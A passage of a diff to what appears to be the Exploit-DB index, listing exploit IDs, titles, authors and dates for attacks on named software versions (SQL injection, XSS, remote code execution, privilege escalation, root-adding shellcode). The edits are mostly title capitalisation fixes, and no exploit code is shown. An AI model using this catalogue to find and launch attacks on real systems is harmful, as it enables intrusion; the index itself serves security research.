Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 +34114,platforms/php/webapps/34114.txt,"Joomla! Jreservation Component - Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 +34086,platforms/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 34087,platforms/php/webapps/34087.txt,"Joomla YouTube Gallery Component - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0 34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat - 'r' Parameter Cross-Site Scripting",2010-06-14,Sid3^effects,php,webapps,0 @@ -30715,7 +30716,7 @@ id,file,description,date,author,platform,type,port 34082,platforms/php/webapps/34082.txt,"Obsession-Design Image-Gallery 1.1 - 'display.php' Cross-Site Scripting",2010-01-02,kaMtiEz,php,webapps,0 34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Parameter Cross-Site Scripting",2009-12-30,emgent,php,webapps,0 34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0 -34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for Wordpress - Cross-Site Scripting",2010-06-04,MustLive,php,webapps,0 +34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for WordPress - Cross-Site Scripting",2010-06-04,MustLive,php,webapps,0 34137,platforms/php/webapps/34137.txt,"Joomla! 'com_videowhisper_2wvc' Component - Cross-Site Scripting",2010-06-10,Sid3^effects,php,webapps,0 34088,platforms/android/remote/34088.html,"Boat Browser 8.0 / 8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0 34089,platforms/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80 @@ -30744,8 +30745,8 @@ id,file,description,date,author,platform,type,port 34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2014-07-17,LiquidWorm,php,webapps,80 40296,platforms/php/webapps/40296.txt,"FreePBX 13.0.35 - Remote Command Execution",2016-08-29,0x4148,php,webapps,0 34140,platforms/php/webapps/34140.txt,"AneCMS 1.x - 'modules/blog/index.php' HTML Injection",2010-06-11,"High-Tech Bridge SA",php,webapps,0 -34113,platforms/php/webapps/34113.py,"SilverStripe CMS 2.4 - File Renaming Security Bypass",2010-06-09,"John Leitch",php,webapps,0 -34105,platforms/php/webapps/34105.txt,"Wordpress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80 +34113,platforms/php/webapps/34113.py,"Silverstripe CMS 2.4 - File Renaming Security Bypass",2010-06-09,"John Leitch",php,webapps,0 +34105,platforms/php/webapps/34105.txt,"WordPress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80 34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager - 'target' Parameter Local File Inclusion",2010-06-07,"AnTi SeCuRe",php,webapps,0 34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 - 'key' Parameter Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps,0 34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Parameter Cross-Site Scripting",2009-01-08,"Patrick Webster",java,webapps,0 @@ -30753,7 +30754,7 @@ id,file,description,date,author,platform,type,port 34110,platforms/php/webapps/34110.txt,"PG Auto Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 34339,platforms/php/webapps/34339.txt,"Pligg 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 -34124,platforms/php/webapps/34124.txt,"Wordpress WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0 +34124,platforms/php/webapps/34124.txt,"WordPress WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0 34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",linux,webapps,80 34126,platforms/windows/remote/34126.txt,"Microsoft Help and Support Center - 'sysinfo/sysinfomain.htm' Cross-Site Scripting",2010-06-10,"Tavis Ormandy",windows,remote,0 34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0 @@ -30763,14 +30764,14 @@ id,file,description,date,author,platform,type,port 34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443 34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 - mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0 34134,platforms/lin_x86-64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_x86-64,local,0 -34161,platforms/php/webapps/34161.txt,"Wordpress Video Gallery Plugin 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80 +34161,platforms/php/webapps/34161.txt,"WordPress Video Gallery Plugin 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80 34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0 34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0 34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service",2010-06-17,"Luigi Auriemma",windows,dos,0 34159,platforms/php/webapps/34159.txt,"Gallery XML Joomla! Component 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0 34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos,0 34152,platforms/linux/remote/34152.txt,"CUPS 1.4.2 - Web Interface Information Disclosure",2010-06-15,"Luca Carettoni",linux,remote,0 -34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution Exploit",2014-07-24,LiquidWorm,php,remote,80 +34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution",2014-07-24,LiquidWorm,php,remote,80 34162,platforms/windows/dos/34162.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-07-24,"Gabor Seljan",windows,dos,0 34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0 34164,platforms/linux/dos/34164.pl,"Make 3.81 - Heap Overflow (PoC)",2014-07-24,HyP,linux,dos,0 @@ -30780,36 +30781,36 @@ id,file,description,date,author,platform,type,port 34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80 34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith",php,webapps,0 34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting",2014-07-27,"Mayuresh Dani",php,webapps,0 -34363,platforms/multiple/remote/34363.rb,"Firefox - toString console.time Privileged Javascript Injection",2014-08-19,Metasploit,multiple,remote,0 +34363,platforms/multiple/remote/34363.rb,"Firefox - toString console.time Privileged JavaScript Injection",2014-08-19,Metasploit,multiple,remote,0 34172,platforms/hardware/dos/34172.txt,"Sagem Fast 3304-V1 - Denial Of Service",2014-07-27,Z3ro0ne,hardware,dos,0 34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - Local File Inclusion",2014-07-27,"black hat",php,webapps,0 34174,platforms/windows/remote/34174.txt,"Enemy Territory: Quake Wars 1.5.12642.33243 - Buffer Overflow",2010-08-18,"Luigi Auriemma",windows,remote,0 34175,platforms/php/webapps/34175.txt,"SaffaTunes CMS - 'news.php' Multiple SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0 -34176,platforms/php/webapps/34176.html,"osCmax 2.0 - 'articles.php' Cross-Site Scripting",2010-06-21,"High-Tech Bridge SA",php,webapps,0 +34176,platforms/php/webapps/34176.html,"osCMax 2.0 - 'articles.php' Cross-Site Scripting",2010-06-21,"High-Tech Bridge SA",php,webapps,0 34177,platforms/php/webapps/34177.txt,"Sigmer Technologies Scribe CMS - 'copy_folder.php' Cross-Site Scripting",2010-06-21,"High-Tech Bridge SA",php,webapps,0 34178,platforms/windows/remote/34178.txt,"id Software id Tech 4 Engine - 'idGameLocal::GetGameStateObject()' Remote Code Execution",2010-07-21,"Luigi Auriemma",windows,remote,0 -34179,platforms/jsp/webapps/34179.txt,"IBM WebSphere ILOG JRules 6.7 - Cross-Site Scripting",2010-06-21,IBM,jsp,webapps,0 +34179,platforms/jsp/webapps/34179.txt,"IBM Websphere ILOG JRules 6.7 - Cross-Site Scripting",2010-06-21,IBM,jsp,webapps,0 34180,platforms/asp/webapps/34180.txt,"webConductor - 'default.asp' SQL Injection",2010-06-22,"Th3 RDX",asp,webapps,0 34181,platforms/php/webapps/34181.txt,"SoftComplex PHP Event Calendar 1.5 - Multiple Remote Vulnerabilities",2010-06-22,"cp77fk4r ",php,webapps,0 34182,platforms/hardware/remote/34182.txt,"Linksys WAP54Gv3 Wireless Router - 'debug.cgi' Cross-Site Scripting",2010-06-23,"Cristofaro Mune",hardware,remote,0 34183,platforms/php/webapps/34183.txt,"Jamroom 4.0.2/4.1.x - 'forum.php' Cross-Site Scripting",2010-06-21,"High-Tech Bridge SA",php,webapps,0 -34184,platforms/hardware/remote/34184.txt,"Trend Micro InterScan Web Security Virtual Appliance - Multiple Vulnerabilities",2010-06-14,"Ivan Huertas",hardware,remote,0 -34185,platforms/php/webapps/34185.txt,"Pre Projects Multi-Vendor Shopping Malls - 'products.php' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0 +34184,platforms/hardware/remote/34184.txt,"Trend Micro Interscan Web Security Virtual Appliance - Multiple Vulnerabilities",2010-06-14,"Ivan Huertas",hardware,remote,0 +34185,platforms/php/webapps/34185.txt,"Pre Projects Multiple Vendors Shopping Malls - 'products.php' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0 34186,platforms/multiple/remote/34186.txt,"Apache Axis2 1.x - '/axis2/axis2-admin' Session Fixation",2010-06-23,"Tiago Ferreira Barbosa",multiple,remote,0 34187,platforms/hardware/webapps/34187.txt,"Ubiquiti UbiFi / mFi / AirVision - Cross-Site Request Forgery",2014-07-28,"Seth Art",hardware,webapps,80 34190,platforms/php/webapps/34190.txt,"Oxwall 1.7.0 - Multiple Cross-Site Request Forgery / HTML Injection Vulnerabilities",2014-07-28,LiquidWorm,php,webapps,80 -34191,platforms/php/remote/34191.py,"Oxwall 1.7.0 - Remote Code Execution Exploit",2014-07-28,LiquidWorm,php,remote,80 +34191,platforms/php/remote/34191.py,"Oxwall 1.7.0 - Remote Code Execution",2014-07-28,LiquidWorm,php,remote,80 34192,platforms/linux/remote/34192.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow",2010-06-22,"Martin Barbella",linux,remote,0 34194,platforms/asp/webapps/34194.txt,"Lois Software WebDB 2.0A Script - Multiple SQL Injections",2010-06-24,"High-Tech Bridge SA",asp,webapps,0 -34195,platforms/php/webapps/34195.txt,"Wordpress Cimy Counter 0.9.4 Plugin - HTTP Response Splitting / Cross-Site Scripting",2010-05-05,MustLive,php,webapps,0 +34195,platforms/php/webapps/34195.txt,"WordPress Cimy Counter 0.9.4 Plugin - HTTP Response Splitting / Cross-Site Scripting",2010-05-05,MustLive,php,webapps,0 34196,platforms/ios/webapps/34196.txt,"WiFi HD 7.3.0 iOS - Multiple Vulnerabilities",2014-07-29,Vulnerability-Lab,ios,webapps,0 34197,platforms/php/webapps/34197.txt,"AbleSpace 1.0 - 'news.php' SQL Injection",2010-06-25,JaMbA,php,webapps,0 34198,platforms/php/webapps/34198.txt,"Limny 2.1 - 'q' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 34200,platforms/hardware/remote/34200.txt,"Cisco Adaptive Security Response - HTTP Response Splitting",2010-06-25,"Daniel King",hardware,remote,0 -34201,platforms/linux/remote/34201.txt,"feh 1.7 - '--wget-timestamp' Remote Code Execution",2010-06-25,anonymous,linux,remote,0 +34201,platforms/linux/remote/34201.txt,"feh 1.7 - '--wget-Timestamp' Remote Code Execution",2010-06-25,anonymous,linux,remote,0 34203,platforms/hardware/dos/34203.txt,"Dlink DWR-113 Rev. Ax - Cross-Site Request Forgery Denial of Service",2014-07-30,"Blessen Thomas",hardware,dos,0 34204,platforms/php/webapps/34204.html,"SkaDate Lite 2.0 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2014-07-30,LiquidWorm,php,webapps,80 -34205,platforms/php/webapps/34205.py,"SkaDate Lite 2.0 - Remote Code Execution Exploit",2014-07-30,LiquidWorm,php,webapps,80 +34205,platforms/php/webapps/34205.py,"SkaDate Lite 2.0 - Remote Code Execution",2014-07-30,LiquidWorm,php,webapps,80 34206,platforms/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80 34207,platforms/php/webapps/34207.txt,"Customer Paradigm PageDirector - 'id' Parameter SQL Injection",2010-06-28,Tr0y-x,php,webapps,0 34208,platforms/hardware/remote/34208.txt,"D-Link DAP-1160 Wireless Access Point - DCC Protocol Security Bypass",2010-06-28,"Cristofaro Mune",hardware,remote,0 @@ -30846,7 +30847,7 @@ id,file,description,date,author,platform,type,port 34239,platforms/php/webapps/34239.txt,"Status2k Server Monitoring Software - Multiple Vulnerabilities",2014-08-02,"Shayan S",php,webapps,80 34240,platforms/ios/webapps/34240.txt,"TigerCom iFolder+ 1.2 iOS - Multiple Vulnerabilities",2014-08-02,Vulnerability-Lab,ios,webapps,8080 34241,platforms/linux/webapps/34241.txt,"ISPConfig 3.0.54p1 - Authenticated Admin Privilege Escalation",2014-08-02,mra,linux,webapps,8080 -34336,platforms/php/webapps/34336.html,"Wordpress Disqus 2.7.5 Plugin - Admin PersistentCross-Site Request Forgery / Cross-Site Scripting",2014-08-14,"Nik Cubrilovic",php,webapps,80 +34336,platforms/php/webapps/34336.html,"WordPress Disqus 2.7.5 Plugin - Admin PersistentCross-Site Request Forgery / Cross-Site Scripting",2014-08-14,"Nik Cubrilovic",php,webapps,80 34337,platforms/php/webapps/34337.txt,"Gekko Web Builder 9.0 - 'index.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34338,platforms/php/webapps/34338.html,"Pixie 1.0.4 - HTML Injection / Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34243,platforms/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal",2014-08-02,Vulnerability-Lab,ios,webapps,8080 @@ -30870,7 +30871,7 @@ id,file,description,date,author,platform,type,port 34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod (777 /etc/passwd & /etc/shadow)_ Add New Root User (ALI/ALI) & Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0 34263,platforms/ios/webapps/34263.txt,"Video WiFi Transfer 1.01 - Directory Traversal",2014-08-04,Vulnerability-Lab,ios,webapps,8080 34264,platforms/ios/webapps/34264.txt,"FreeDisk 1.01 iOS - Multiple Vulnerabilities",2014-08-04,Vulnerability-Lab,ios,webapps,8080 -34265,platforms/php/webapps/34265.txt,"Exponent CMS 0.97 - 'slideshow.js.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 +34265,platforms/php/webapps/34265.txt,"Exponent CMS 0.97 - 'Slideshow.js.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 34266,platforms/php/webapps/34266.txt,"RunCMS 2.1 - 'check.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 34267,platforms/linux/local/34267.sh,"Altair Engineering PBS Pro 10.x - 'pbs_mom' Insecure Temporary File Creation",2010-07-07,"Bartlomiej Balcerek",linux,local,0 34268,platforms/php/webapps/34268.txt,"Worxware DCP-Portal 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 @@ -30895,11 +30896,11 @@ id,file,description,date,author,platform,type,port 34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 - 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0 34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injection",2009-12-22,"Hadi Kiamarsi",php,webapps,0 34289,platforms/php/webapps/34289.txt,"Web Cocoon simpleCMS - 'show.php' SQL Injection",2009-12-21,anonymous,php,webapps,0 -34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 - 'searchString' Parameter Cross-Site Scripting",2010-07-11,10n1z3d,java,webapps,0 +34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 - 'SearchString' Parameter Cross-Site Scripting",2010-07-11,10n1z3d,java,webapps,0 34291,platforms/php/webapps/34291.txt,"Joomla! Rapid-Recipe Component - HTML Injection",2010-07-10,Sid3^effects,php,webapps,0 34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 34293,platforms/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Parameter Cross-Site Scripting",2010-07-12,"David K",java,webapps,0 -34294,platforms/php/webapps/34294.txt,"FireStats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0 +34294,platforms/php/webapps/34294.txt,"Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0 34295,platforms/php/webapps/34295.txt,"RunCMS 2.1 - 'magpie_debug.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0 34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 - 'css_optimiser.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0 34297,platforms/multiple/remote/34297.txt,"dotDefender - Cross-Site Scripting Security Bypass",2010-07-09,SH4V,multiple,remote,0 @@ -30924,7 +30925,7 @@ id,file,description,date,author,platform,type,port 34317,platforms/php/webapps/34317.txt,"WS Interactive Automne 4.0 - '228-recherche.php' Cross-Site Scripting",2009-12-13,loneferret,php,webapps,0 34318,platforms/php/webapps/34318.txt,"Zeecareers 2.0 - Cross-Site Scripting / Authentication Bypass",2009-12-13,bi0,php,webapps,0 34319,platforms/php/webapps/34319.txt,"Ez Cart - 'index.php' Cross-Site Scripting",2009-12-14,anti-gov,php,webapps,0 -34320,platforms/php/webapps/34320.txt,"GetSimple CMS 2.01 - admin/template/error_checking.php Multiple Parameter Cross-Site Scripting",2010-07-15,Leonard,php,webapps,0 +34320,platforms/php/webapps/34320.txt,"Getsimple CMS 2.01 - admin/template/error_checking.php Multiple Parameter Cross-Site Scripting",2010-07-15,Leonard,php,webapps,0 34321,platforms/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",php,webapps,0 34322,platforms/php/webapps/34322.txt,"PHPwcms 1.4.5 - 'PHPwcms.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 - 'modmenu.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 @@ -30934,7 +30935,7 @@ id,file,description,date,author,platform,type,port 34334,platforms/win_x86-64/remote/34334.rb,"VirtualBox - 3D Acceleration Virtual Machine Escape",2014-08-14,Metasploit,win_x86-64,remote,0 34333,platforms/windows/local/34333.rb,"VirtualBox Guest Additions - VBoxGuest.sys Privilege Escalation",2014-08-13,Metasploit,windows,local,0 34331,platforms/windows/local/34331.py,"BlazeDVD Pro 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0 -34343,platforms/asp/webapps/34343.txt,"MOJO IWms 7 - 'default.asp' Cookie Manipulation",2007-12-17,"cp77fk4r ",asp,webapps,0 +34343,platforms/asp/webapps/34343.txt,"MOJO IWms 7 - 'default.asp' Cookie manipulation",2007-12-17,"cp77fk4r ",asp,webapps,0 34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET - Multiple SQL Injections",2009-12-17,bi0,asp,webapps,0 34345,platforms/java/webapps/34345.txt,"jCore - 'search' Parameter Cross-Site Scripting",2009-12-17,loneferret,java,webapps,0 34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate - Arbitrary File Upload",2014-09-09,Metasploit,windows,remote,8020 @@ -30948,7 +30949,7 @@ id,file,description,date,author,platform,type,port 34354,platforms/php/webapps/34354.txt,"TenderSystem 0.9.5 - 'main.php' Multiple Local File Inclusion",2009-12-14,Packetdeath,php,webapps,0 34355,platforms/windows/dos/34355.txt,"Microsoft DirectX 8/9 DirectPlay - Multiple Denial Of Service Vulnerabilities",2010-07-18,"Luigi Auriemma",windows,dos,0 34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 - Remote Buffer Overflow",2009-12-12,"Razuel Akaharnath",linux,dos,0 -34357,platforms/php/webapps/34357.txt,"ScriptsEz Ez FAQ Maker 1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-15,"Milos Zivanovic ",php,webapps,0 +34357,platforms/php/webapps/34357.txt,"Scriptsez Ez FAQ Maker 1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-15,"Milos Zivanovic ",php,webapps,0 34358,platforms/linux/remote/34358.txt,"Mozilla Firefox and SeaMonkey Plugin Parameters - Buffer Overflow",2010-07-20,J23,linux,remote,0 34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 - Cross-Site Request Forgery",2010-07-20,anonymous,windows,dos,0 34360,platforms/multiple/dos/34360.txt,"Monolith Lithtech Game Engine - Memory Corruption",2010-07-21,"Luigi Auriemma",multiple,dos,0 @@ -30959,7 +30960,7 @@ id,file,description,date,author,platform,type,port 34367,platforms/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",php,webapps,0 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0 34369,platforms/multiple/remote/34369.txt,"IBM Java - UTF8 Byte Sequences Security Bypass",2010-07-23,IBM,multiple,remote,0 -34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 +34370,platforms/jsp/webapps/34370.txt,"SAP NetWeaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0 34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 - SQL Injection / Cross-Site Scripting",2010-07-25,MustLive,php,webapps,0 34374,platforms/php/webapps/34374.txt,"Joomla! FreiChat Component 1.0/2.x - Unspecified HTML Injection",2010-07-26,nag_sunny,php,webapps,0 @@ -30982,7 +30983,7 @@ id,file,description,date,author,platform,type,port 34390,platforms/php/remote/34390.rb,"HybridAuth - install.php PHP Code Execution",2014-08-21,Metasploit,php,remote,80 34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite - Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0 34392,platforms/php/webapps/34392.txt,"MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0 -34393,platforms/php/webapps/34393.txt,"Joomla! 'com_jigsaw' Component - 'controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0 +34393,platforms/php/webapps/34393.txt,"Joomla! 'com_jigsaw' Component - 'Controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0 34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - HTTP GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial Of Service",2010-08-03,"Rodrigo Escobar",windows,dos,0 34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0 @@ -30991,7 +30992,7 @@ id,file,description,date,author,platform,type,port 34498,platforms/php/webapps/34498.txt,"ViArt Helpdesk - forum.php forum_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34399,platforms/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",ios,remote,0 34400,platforms/php/webapps/34400.txt,"RaidenTunes - 'music_out.php' Cross-Site Scripting",2014-08-03,LiquidWorm,php,webapps,0 -34401,platforms/php/webapps/34401.txt,"PHP168 Template Editor - 'filename' Parameter Directory Traversal",2009-10-04,esnra,php,webapps,0 +34401,platforms/php/webapps/34401.txt,"PHP168 Template Editor - 'Filename' Parameter Directory Traversal",2009-10-04,esnra,php,webapps,0 34402,platforms/php/webapps/34402.txt,"OpenSolution Quick.Cart - Local File Inclusion / Cross-Site Scripting",2009-10-08,kl3ryk,php,webapps,0 34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos,0 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0 @@ -31010,7 +31011,7 @@ id,file,description,date,author,platform,type,port 34419,platforms/multiple/webapps/34419.txt,"ntopng 1.2.0 - Cross-Site Scripting Injection",2014-08-26,"Steffen Bauch",multiple,webapps,0 34420,platforms/cgi/webapps/34420.txt,"VTLS Virtua InfoStation.cgi - SQL Injection",2014-08-26,"José Tozo",cgi,webapps,80 34421,platforms/linux/local/34421.c,"glibc - Off-by-One NUL Byte gconv_translit_find Exploit",2014-08-27,"taviso and scarybeasts",linux,local,0 -34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - (search.php cat parameter) SQL Injection",2014-09-03,D35m0nd142,php,webapps,80 +34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - (search.php cat Parameter) SQL Injection",2014-09-03,D35m0nd142,php,webapps,80 34426,platforms/linux/remote/34426.txt,"uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection",2010-08-05,Chuzz,linux,remote,0 34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",linux,dos,0 34424,platforms/php/webapps/34424.txt,"WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 @@ -31021,7 +31022,7 @@ id,file,description,date,author,platform,type,port 34432,platforms/php/webapps/34432.txt,"Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0 34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 - 'SDL2.php' Cross-Site Scripting",2010-10-22,"Amol Naik",php,webapps,0 34456,platforms/php/webapps/34456.txt,"JBoard - Multiple Cross-Site Scripting / SQL Injection",2009-08-31,Inj3ct0r,php,webapps,0 -34436,platforms/php/webapps/34436.txt,"Wordpress ShortCode Plugin 0.2.3 - Local File Inclusion",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0 +34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 0.2.3 - Local File Inclusion",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0 34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision",2010-08-11,"Florian Zumbiehl",windows,remote,0 34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 - 'Topic' Field HTML Injection",2010-08-11,3ethicalhackers.com,php,webapps,0 34439,platforms/multiple/remote/34439.txt,"ServletExec - (Directory Traversal / Authentication Bypass) Multiple Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0 @@ -31033,7 +31034,7 @@ id,file,description,date,author,platform,type,port 34445,platforms/php/webapps/34445.txt,"LiveStreet 0.2 - Comment Topic Header Cross-Site 